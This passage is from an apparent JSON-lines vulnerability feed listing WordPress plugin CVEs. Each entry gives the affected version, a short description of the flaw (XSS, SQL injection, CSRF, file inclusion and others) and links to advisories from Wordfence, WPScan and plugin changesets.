link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a41226ab-9732-4de2-843b-284c011c9224?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a41226ab-9732-4de2-843b-284c011c9224?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7401","slug":"age-restriction","versionImpact":"3.0.2","description":"The Premium Age Verification \/ Restriction for WordPress plugin for WordPress is vulnerable to arbitrary file read and write due to the existence of an insufficiently protected remote support functionality in remote_tunnel.php in all versions up to, and including, 3.0.2. This makes it possible for unauthenticated attackers to read from or write to arbitrary files on the affected site's server which may make the exposure of sensitive information or remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/premium-age-verification-restriction-for-wordpress\\\/11300327\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/premium-age-verification-restriction-for-wordpress\\\/11300327\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0906a45-6d9b-48a0-98ae-df7b591a8848?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0906a45-6d9b-48a0-98ae-df7b591a8848?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6184","slug":"tutor","versionImpact":"3.7.0","description":"The Tutor LMS Pro \u2013 eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter used in the get_submitted_assignments() function in all versions up to, and including, 3.7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Tutor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Only the Pro version is affected.","refs":"[{\"url\":\"https:\\\/\\\/tutorlms.com\\\/\",\"name\":\"https:\\\/\\\/tutorlms.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b41d134-be9e-469f-b26b-ac30d95db0a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b41d134-be9e-469f-b26b-ac30d95db0a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4669","slug":"live-composer-page-builder","versionImpact":"1.5.22","description":"The Page Builder: Live Composer WordPress plugin through 1.5.22 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79f011e4-3422-4307-8736-f27048796aae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79f011e4-3422-4307-8736-f27048796aae\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36737","slug":"astra-import-export","versionImpact":"1.0.3","description":"The Import \/ Export Customizer Settings plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the astra_admin_errors() function. This makes it possible for unauthenticated attackers to display an import status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368366%40astra-import-export&new=2368366%40astra-import-export&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368366%40astra-import-export&new=2368366%40astra-import-export&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/194face3-36ac-4137-af9a-0b98f60e3afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/194face3-36ac-4137-af9a-0b98f60e3afb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5974","slug":"wpb-show-core","versionImpact":"2.2","description":"The WPB Show Core WordPress plugin through 2.2 is vulnerable to server-side request forgery (SSRF) via the `path` parameter.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0136057-f420-4fe7-a147-ecbec7e7a9b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0136057-f420-4fe7-a147-ecbec7e7a9b5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1382","slug":"nd-restaurant-reservations","versionImpact":"1.9","description":"The Restaurant Reservations plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the nd_rst_layout attribute of the nd_rst_search shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where an uploaded PHP file may not be directly accessible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d51db160-c701-426d-890f-73cc4785cad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d51db160-c701-426d-890f-73cc4785cad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-restaurant-reservations\\\/trunk\\\/addons\\\/visual\\\/search\\\/index.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-restaurant-reservations\\\/trunk\\\/addons\\\/visual\\\/search\\\/index.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9024","slug":"material-design-icons","versionImpact":"0.0.5","description":"The Material Design Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mdi-icon shortcode in all versions up to, and including, 0.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9979381e-711d-42c8-bfdf-4ee99e2e556f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9979381e-711d-42c8-bfdf-4ee99e2e556f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/material-design-icons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/material-design-icons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/plugin.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/plugin.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/js\\\/mdi-icons.js#L1311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/js\\\/mdi-icons.js#L1311\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8915","slug":"category-icon","versionImpact":"1.0.0","description":"The Category Icon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/category-icon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/category-icon\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-icon\\\/trunk\\\/category-icon.php#L437\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-icon\\\/trunk\\\/category-icon.php#L437\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167148\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167148\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10227","slug":"affiliate-toolkit-starter","versionImpact":"3.6.5","description":"The affiliate-toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atkp_product shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86568f-dcdd-44fb-905a-9c5474f56515?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86568f-dcdd-44fb-905a-9c5474f56515?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-toolkit-starter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-toolkit-starter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174286\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174286\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/servit.dev\\\/\",\"name\":\"https:\\\/\\\/servit.dev\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11943","slug":"pgall-for-woocommerce","versionImpact":"5.2.2","description":"The ????? ?? ???? \u2013 ???? ?? ???? plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.2.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-pafw-admin-notice.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-pafw-admin-notice.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202085\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202085\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d85d609-781b-4f82-af57-124767f9d333?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d85d609-781b-4f82-af57-124767f9d333?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11900","slug":"portfolio-pro","versionImpact":"1.2.2","description":"The Portfolio \u2013 Filterable Masonry Portfolio Gallery for Professionals plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'portfolio-pro' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-pro\\\/trunk\\\/public\\\/class-portfolio-pro-public.php#L358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-pro\\\/trunk\\\/public\\\/class-portfolio-pro-public.php#L358\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1989fe85-5c32-4671-bd20-f9d05cb5034c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1989fe85-5c32-4671-bd20-f9d05cb5034c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12699","slug":"service-boxs","versionImpact":"1.9","description":"The Service Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216752%40service-boxs&new=3216752%40service-boxs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216752%40service-boxs&new=3216752%40service-boxs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/service-boxs\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/service-boxs\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6a65630-0852-4ffc-8c23-295be95bd7f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6a65630-0852-4ffc-8c23-295be95bd7f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1509","slug":"show-me-the-cookies","versionImpact":"1.0","description":"The The Show Me The Cookies plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/show-me-the-cookies\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/show-me-the-cookies\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d15ceb-ab39-4088-a289-7244063aedf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d15ceb-ab39-4088-a289-7244063aedf8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12873","slug":"custom-field-manager","versionImpact":"1.0","description":"The Custom Field Manager WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e82d45f-7b8f-424e-a8d7-be64f5acf65e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e82d45f-7b8f-424e-a8d7-be64f5acf65e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4964","slug":"wp-online-users-stats","versionImpact":"1.0.0","description":"The WP Online Users Stats plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018table_name\u2019 parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7ef66cf-ddf1-42be-82b1-cb6edcbf253c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7ef66cf-ddf1-42be-82b1-cb6edcbf253c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4666","slug":"wp-structuring-markup","versionImpact":"4.8.1","description":"The Markup (JSON-LD) structured in schema.org WordPress plugin through 4.8.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6d23f2f-9504-40da-9b71-189033d8bd1d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6d23f2f-9504-40da-9b71-189033d8bd1d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4369","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Content Injection in versions up to, and including, 18.2. This is due to lacking authorization protections, checks against users editing other's posts, and lacking a security nonce, all on the wpfm_edit_file_title_desc AJAX action. This makes it possible for unauthenticated attackers to edit the content and title of every page on the site.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c434e6b8-0dd5-4ffe-93b1-1af614c08f85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c434e6b8-0dd5-4ffe-93b1-1af614c08f85?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36736","slug":"cartflows","versionImpact":"1.5.15","description":"The WooCommerce Checkout & Funnel Builder by CartFlows plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.15. This is due to missing or incorrect nonce validation on the export_json, import_json, and status_logs_file functions. This makes it possible for unauthenticated attackers to import\/export settings and trigger logs showing via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368446\\\/cartflows\\\/trunk\\\/classes\\\/class-cartflows-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368446\\\/cartflows\\\/trunk\\\/classes\\\/class-cartflows-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d98c849-4178-4cee-846b-2c136bc56daf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d98c849-4178-4cee-846b-2c136bc56daf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3136","slug":"mailarchiver","versionImpact":"2.10.1","description":"The MailArchiver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce330cae-c2f8-42f3-822b-ca24bf46e433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce330cae-c2f8-42f3-822b-ca24bf46e433?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2937545\\\/mailarchiver\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2937545\\\/mailarchiver\",\"refsource\":\"MISC\",\"tags\":[]}]"}
